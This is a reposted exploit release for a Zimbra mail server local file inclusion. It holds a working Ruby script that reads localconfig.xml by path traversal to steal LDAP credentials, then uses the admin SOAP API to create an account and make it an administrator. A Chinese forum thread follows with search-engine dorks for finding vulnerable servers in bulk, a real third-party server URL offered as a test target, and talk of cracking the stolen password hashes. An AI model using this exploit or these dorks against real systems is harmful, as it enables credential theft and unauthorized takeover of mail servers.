# Exploit Title: Zimbra 0day exploit / Privilegie escalation via LFI
# Date: 06 Dec 2013
# Exploit Author: rubina119
# Contact Email : rubina119[at]gmail.com
# Vendor Homepage: http://www.zimbra.com/
# Version: 2009, 2010, 2011, 2012 and early 2013 versions are afected,
# Tested on: Centos(x), Ubuntu.
# CVE : No CVE, no patch just 0Day
# State : Critical
# Mirror: http://www.exploit-db.com/sploits/zimbraexploit_rubina119.zip
---------------Description-----------------
This script exploits a Local File Inclusion in
/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz
which allows us to see localconfig.xml
that contains LDAP root credentials wich allow us to make requests in
/service/admin/soap API with the stolen LDAP credentials to create user
with administration privlegies
and gain acces to the Administration Console.
LFI is located at :
/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00
Example :
https://mail.example.com/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00
or
https://mail.example.com:7071/zimbraAdmin/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00
----------------Exploit-----------------
Before use this exploit, target server must have admin console port open
"7071" otherwise it won't work.
use the exploit like this :
ruby run.rb -t mail.example.com -u someuser -p Test123_23
[*] Looking if host is vuln....
[+] Host is vuln exploiting...
[+] Obtaining Domain Name
[+] Creating Account
[+] Elevating Privileges
[+] Login Credentials
[*] Login URL : https://mail.example.com:7071/zimbraAdmin/
[*] Account : someuser@example.com
[*] Password : Test123_23
[+] Successfully Exploited !
The number of servers vuln are huge like 80/100.
This is only for educational purpouses.
影响版本:2009, 2010, 2011, 2012 and early 2013
测试方法:
http://mail.example.com/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00
https://mail.example.com:7071/zimbraAdmin/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00
----------------Exploit----------------- Before use this exploit, target server must have admin console port open "7071" otherwise it won't work. use the exploit like this : ruby run.rb -t mail.example.com -u someuser -p Test123_23 [*] Looking if host is vuln.... [+] Host is vuln exploiting... [+] Obtaining Domain Name [+] Creating Account [+] Elevating Privileges [+] Login Credentials [*] Login URL : https://mail.example.com:7071/zimbraAdmin/ [*] Account : someuser@example.com [*] Password : Test123_23 [+] Successfully Exploited !
run.rb:
# /usr/bin/ruby
#
# Author: Eduardo Rubina H.
# Email : rubina119[at]gmail.com
# Date : 03 Dec 2013
# State : Critical
#
# Description : This script exploits a Local File Inclusion in /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz which allows us to see localconfig.xml
# that contains LDAP root credentials wich allow us to make requests in /service/admin/soap API with the stolen LDAP credentials to create user with administration privlegies
# and a lot of stuff also the lfi leets you see .bash_history, ssh pub keys, config files, etc.
#
#
# LFI : /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00
#
#
require 'net/https'
require 'getoptlong'
require './ultils.rb'
data = nil
def exploit_begin()
puts "[+] Looking if host is vuln..."
http = Net::HTTP.new( $host, 7071 )
http.use_ssl = true
http.verify_mode = OpenSSL::SSL::VERIFY_NONE
req = Net::HTTP::Get.new( "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00", { "Accept-Encoding" => "gzip", "User-Agent" => "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36" } )
res = http.request( req )
case res
when Net::HTTPSuccess then
begin
if res.header[ 'Content-Encoding' ].eql?( 'gzip' ) then
sio = StringIO.new( res.body )
gz = Zlib::GzipReader.new( sio )
puts "[+] Host is vuln exploiting"
resbody = gz.read()
part1 = resbody.gsub("\n", ' ').squeeze(' ')
part2 = part1.gsub("a[", '').squeeze(' ')
ldap_user = part2.match(/name=\\"zimbra_user\\">"; "<value>(.*?)<\/value>/ui)[1]
ldap_pass = part2.match(/name=\\"zimbra_ldap_password\\">"; "<value>(.*?)<\/value>/ui)[1]
get_auth_token(ldap_user,ldap_pass)
else
puts "[-] Host is not vulnerable !"
return false
end
rescue Exception
#puts "[-] Connection Failed !"
return false
end
end
end
def get_auth_token(user,pass)
https = Net::HTTP.new( $host, 7071 )
path = "/service/admin/soap"
https.use_ssl = true
https.verify_mode = OpenSSL::SSL::VERIFY_NONE
body = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>
<env:Envelope xmlns:env=\"http://www.w3.org/2003/05/soap-envelope\" xmlns:ns1=\"urn:zimbraAdmin\" xmlns:ns2=\"urn:zimbraAdmin\"><env:Header><ns2:context/></env:Header><env:Body><ns1:AuthRequest><account by=\"name\">#{user}</account><password>#{pass}</password></ns1:AuthRequest></env:Body></env:Envelope>"
data = https.post(path, body, { "Content-Type" => "application/soap+xml; charset=utf-8; action=\"urn:zimbraAdmin#AuthRequest\"" } )
$auth_key = data.body.match(/<authToken>(.*)<\/authToken>/iu)[1]
exploit()
end
def exploit()
puts "[+] Obtaining Domain Name"
get_domain_soap_data = "<GetAllDomainsRequest xmlns=\"urn:zimbraAdmin\"></GetAllDomainsRequest>"
get_domain = Utils.new.request_soap_admin(get_domain_soap_data)
domain = get_domain.match(/<a n=\"zimbraDomainName\">(.*?)<\/a>/iu)[1]
puts "[+] Creating Account"
create_account_soap_data = "<CreateAccountRequest xmlns=\"urn:zimbraAdmin\"><name>#{$user}@#{domain}</name><password>#{$password}</password></CreateAccountRequest>"
create_account = Utils.new.request_soap_admin(create_account_soap_data)
a_id = create_account.match(/account id="(.*)" name="/ui)[1]
puts "[+] Elevating Privileges"
elevate_privs_soap_data = "<ModifyAccountRequest xmlns=\"urn:zimbraAdmin\"><id>#{a_id}</id><a n=\"zimbraIsAdminAccount\">TRUE</a></ModifyAccountRequest>"
elevate_privs = Utils.new.request_soap_admin(elevate_privs_soap_data)
puts "[+] Login Credentials"
puts " [*] Login URL : https://#{domain}:7071/zimbraAdmin/ "
puts " [*] Account : #{$user}@#{domain}"
puts " [*] Password : #{$password}"
puts "[+] Successfully Exploited !"
end
def usage
print( "
-t, --target
Host to attack ip or domain
-u, --useraccount
The user name to be used to create the account, only alfanumeric chars.
-p, --password
Password that will be used to create the account,
pass needs to be alfanumeric upercase and lowercase and special chars, minchar(8).
-h, --help
Print this help message
"
)
end
puts ""
puts ""
puts "#########################################################################################"
puts "Zimbra Email Collaboration Server 0day Exploit by rubina119"
puts "#########################################################################################"
puts ""
puts ""
opts = GetoptLong.new(
[ '--target', '-t', GetoptLong::REQUIRED_ARGUMENT ],
[ '--useraccount','-u', GetoptLong::REQUIRED_ARGUMENT ],
[ '--password','-p', GetoptLong::REQUIRED_ARGUMENT ],
[ '--help','-h', GetoptLong::OPTIONAL_ARGUMENT ]
)
opts.each do |opt, arg|
case opt
when '--help'
usage()
when '--target'
$host = arg
when '--useraccount'
$user = arg
when '--password'
$password = arg
end
end
if $host == nil
usage()
else
exploit_begin()
end
ultils.rb
# /usr/bin/ruby
require 'net/https'
class Utils
def request_soap_admin(api_call)
@request=api_call
soap_client = Net::HTTP.new( $host, 7071 )
soap_client.use_ssl = true
soap_client.verify_mode = OpenSSL::SSL::VERIFY_NONE
soap_path = "/service/admin/soap"
soap_data = "<soap:Envelope xmlns:soap=\"http://www.w3.org/2003/05/soap-envelope\"><soap:Header><context xmlns=\"urn:zimbra\"><authToken>#{$auth_key}</authToken></context></soap:Header><soap:Body>#{@request}</soap:Body></soap:Envelope>"
response = soap_client.post(soap_path, soap_data, { "Content-Type" => "application/soap+xml; charset=utf-8; action=\"urn:zimbraAdmin\"" } )
if response.body.match(/Error/)
error_res = response.body.match(/<soap:Text>(.*?)<\/soap:Text>/ui)[1]
puts "[-] Response Error"
puts " [*] #{error_res}"
false
else
return response.body
end
end
end
批量搜索方法:title:zimbra web client sign in (百度下测试一搜索一大片)
虽然有些没开7071但是配置文件还是能被包含出来,不知道里面加密的数据能不能被破解出来
乌云讨论:
1#
火星人 (不会技术活) | 2013-12-09 16:56
批量的、?
2#
生生不息 | 2013-12-09 17:11
又见包含 7071是默认端口就可以批量。
3#
dren | 2013-12-09 17:28
不错
4#
hacker@sina.cn | 2013-12-09 18:29
这个真心屌炸天 测试站点:https://mail.ecmwf.int/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00
5#
hacker@sina.cn | 2013-12-09 18:49
这个真心屌炸天, 可惜默认不是root运行。另外谁知道密码什么加密?
6#
无敌L.t.H (:?门安天京北爱我) | 2013-12-09 19:51
看来一大堆.EDU要中枪
7#
猪猪侠 (A) | 2013-12-09 20:01
@hacker@sina.cn OpenLDAP SHA
8#
if、so (no talk,but shell!!) | 2013-12-09 20:11
@猪猪侠 是的
9#
if、so (no talk,but shell!!) | 2013-12-09 20:11
@猪猪侠 刚百度了
10#
circus | 2013-12-09 20:43
@if、so 好东西
11#
circus | 2013-12-09 20:51
@if、so inurl:7071 -intext:7071 inurl:zimbra
12#
circus | 2013-12-09 20:52
inurl:7071 intitle:zimbra administration
13#
hacker@sina.cn | 2013-12-09 21:53
没在hashcat里找到适合的密文选项, 尝试ssha 的几乎都失败了。
14#
Jacks | 2013-12-10 01:16
7071端口被改了,有办法找到端口不? 另外 @猪猪侠 有了LDAP 怎么获取所有用户的HASH呢?
15#
luwikes (土豆你个西红柿,番茄你个马铃薯~~~) | 2013-12-10 09:42
mark
留言评论(旧系统):